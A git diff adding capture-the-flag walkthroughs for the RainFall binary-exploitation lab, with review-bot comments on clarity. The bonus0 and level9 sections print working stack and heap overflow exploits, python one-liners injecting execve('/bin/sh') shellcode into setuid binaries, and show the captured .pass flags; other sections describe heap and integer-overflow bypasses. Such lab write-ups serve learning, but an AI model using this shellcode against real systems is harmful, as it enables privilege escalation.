diff --git a/bonus0/Ressources/walkthrough.md b/bonus0/Ressources/walkthrough.md new file mode 100644 index 0000000..0244400 --- /dev/null +++ b/bonus0/Ressources/walkthrough.md 
@@ -0,0 +1,61 @@ +The program segfault when 2nd string is 20 char longs + + +``` +Starting program: /home/user/bonus0/bonus0 + - +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa + - +AAAABBBBCXXXXDDDEEEE +aaaaaaaaaaaaaaaaaaaaAAAABBBBCXXXXDDDEEEE��� AAAABBBBCXXXXDDDEEEE��� + +Program received signal SIGSEGV, Segmentation fault. +0x58585858 in ?? () +``` + +we need to find where our 'a's are stored in the stack, each call to p reads so we will stop after the 1st and proceed to do a search. + +It doesn't work, only thing we can find are a string of 20 'a's near eax. + +We can see there is a strcpy just after both calls to p, and p writes to the same address, so maybe we can do something with that, considering the second string will override the first. + +Still doesn't work, maybe check read's return in p function ? + +Got it at 0xbfffe680, let's leave the function and check if the data's still there + +during second read call, we see our data is still there, but the beginning have been override by our second string. Maybe we can ditch the first string entirely ? 
+ +let's try putting our shell code 3 characters after the 'X's and replace the 'X's with 0xbfffe690 + +``` +bonus0@RainFall:~$ python -c "print('A'*9+'\x90\xe6\xff\xbf+'A'*3+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')" > test.txt + File "", line 1 + print('A'*9+'\x90\xe6\xff\xbf+'A'*3+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68') + ^ +SyntaxError: invalid syntax +bonus0@RainFall:~$ python -c "print('A'*9+'\x90\xe6\xff\xbf'+'A'*3+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')" > test.txt +bonus0@RainFall:~$ echo "a" > 1.txt +bonus0@RainFall:~$ (cat 1.txt ; cat test.txt ; cat) | /home/user/bonus0/bonus0 + - + - +a AAAAAAAAA����AAA1��F��� +whoami +bonus0@RainFall:~$ +``` + +It's doesn't work with an empty first file, let's just put it twice so we don't have to worry about strings overriding or something. +Notice we use the full path of the binary to avoid the need for a NOP slide. + + +``` +bonus0@RainFall:~$ (cat test.txt ; cat test.txt ; cat) | /home/user/bonus0/bonus0 + - + - +AAAAAAAAA����AAA1��FAAAAAAAAA����AAA1��F��� AAAAAAAAA����AAA1��F��� +whoami +bonus1 +cat /home/user/bonus1/.pass +cd1f77a585965341c37a1774a1d1686326e1fc53aaa5459c840409d4d06523c9 +``` + +:) diff --git a/bonus1/Ressources/walkthrough.md b/bonus1/Ressources/walkthrough.md new file mode 100644 index 0000000..7c3c186 --- /dev/null +++ b/bonus1/Ressources/walkthrough.md 
@@ -0,0 +1,5 @@ +We can see using ghidra that we need the first number to be less than 10, but then we need it to be equal to 0x574f4c46, so we will have to change it and the only way to do that is by using the memcpy between the two conditional statements. + +But the memcpy uses the result of atoi * 4 for the size of the cpy. But atoi result should be negative. + +We will use c's wrapping overflow behavior for this problem, and memcpy will override the atoi result position with the desired number. diff --git a/level8/Ressources/walkthrough.md b/level8/Ressources/walkthrough.md new file mode 100644 index 0000000..4efb537 --- /dev/null +++ b/level8/Ressources/walkthrough.md @@ -0,0 +1,2 @@ +For this level, using ghidra we can see that there is a conditional statement that will open a shell. We need the 9th character of the string auth to be different than 0. We can overflow the buffer by adding trailing characters to the service prompt after the auth command. +We can also input the service command twice in a row to do that. diff --git a/level9/Ressources/walkthrough.md b/level9/Ressources/walkthrough.md new file mode 100644 index 0000000..a53926c --- /dev/null +++ b/level9/Ressources/walkthrough.md 
@@ -0,0 +1,44 @@ +For the last level of the mandatory part, we notice there is a twist, as the binary seems to be a cpp code. We don't seem to see any shell or pass reading so we are going to use a shellcode. + +Let's try to make the program segfault with 'A's it segfault from 109, if we put 112 in gdb with 'B's at the end, we get this segfault + +``` +(gdb) i r +eax 0x42424242 1111638594 +ecx 0x42424242 1111638594 +edx 0x804a07c 134520956 +ebx 0x804a078 134520952 +esp 0xbffff6a0 0xbffff6a0 +ebp 0xbffff6c8 0xbffff6c8 +esi 0x0 0 +edi 0x0 0 +eip 0x8048682 0x8048682 +eflags 0x210287 [ CF PF SF IF RF ID ] +cs 0x73 115 +ss 0x7b 123 +ds 0x7b 123 +es 0x7b 123 +fs 0x0 0 +gs 0x33 51 +(gdb) x/i $eip +=> 0x8048682 : mov (%eax),%edx +(gdb) +``` + +later in the code, we got this + +```0x8048693 call *%edx``` + +That means we can put the target address we want to jump to at any point in the string, and put the adress of this at the 109-112 bytes. + +We will target our shellcode with it. + +``` +level9@RainFall:~$ ./level9 `python -c "print('\x10\xa0\x04\x08'+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'+'A'*58+'\x0c\xa0\x04\x08')"` +$ whoami +bonus0 +$ cat /home/user/bonus0/.pass +f3f0004b6f364cb5a4147e9ef827fa922a4861408845c26b6971ad770d906728 +``` + +:)
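Review bot: in bonus0/Ressources/walkthrough.md the second code block keeps the failed `python -c` invocation and its SyntaxError traceback (the closing quote is missing in `'\x90\xe6\xff\xbf+'A'*3`) next to the corrected command; drop the failed attempt so the block shows only the sequence that actually ran. The prose also finds the data "at 0xbfffe680" but replaces the 'X's with 0xbfffe690 without explaining the 0x10 difference. It never names the root cause behind "segfault when 2nd string is 20 char longs" (which read or strcpy runs past which buffer), so a reader cannot tell which call needs a bound to fix the bug. The last block commits the contents of /home/user/bonus1/.pass; consider redacting it.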
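Review bot: in bonus1/Ressources/walkthrough.md the third paragraph attributes the bypass to "c's wrapping overflow behavior", which is imprecise: C defines wrapping only for unsigned arithmetic, and signed overflow is undefined. Say whether the wrap seen in the disassembly comes from the `atoi * 4` multiplication itself or from the conversion to memcpy's unsigned size argument, and state the underlying defect plainly (the "less than 10" check is made on a signed value that is then used as a copy length). "But atoi result should be negative" is given without a reason, and unlike the other walkthroughs this file shows no command or output, so the result cannot be reproduced or checked from the text.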
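Review bot: in level8/Ressources/walkthrough.md the sentence "We need the 9th character of the string auth to be different than 0" is ambiguous: it does not say whether this is the text typed after the auth command or the byte at a fixed offset from the auth pointer, and the next sentence does not say which buffer is overflowed or why input given to service ends up at that offset. Add the relevant lines of the Ghidra decompilation (the condition and the allocations or copies for auth and service) so the claim can be checked. "We can also input the service command twice in a row" needs the same explanation, and a short session transcript like the ones in the other levels would make both variants verifiable.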
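Review bot: in level9/Ressources/walkthrough.md the final command uses 0x0804a010 as the first four bytes and 0x0804a00c at bytes 109-112, but neither address is derived anywhere in the text; the register dump only shows 0x804a078 (ebx) and 0x804a07c (edx). Add the step that shows where the argument is copied, and say explicitly that `mov (%eax),%edx` followed by `call *%edx` is a double dereference, which is why the string starts with a pointer rather than with the shellcode. "it segfault from 109" should say 109 bytes of which input and name the copy that lacks a length check. The one-line fence around `0x8048693 call *%edx` does not match the multi-line fences used elsewhere in the file, and the bonus0 .pass value in the last block is better redacted.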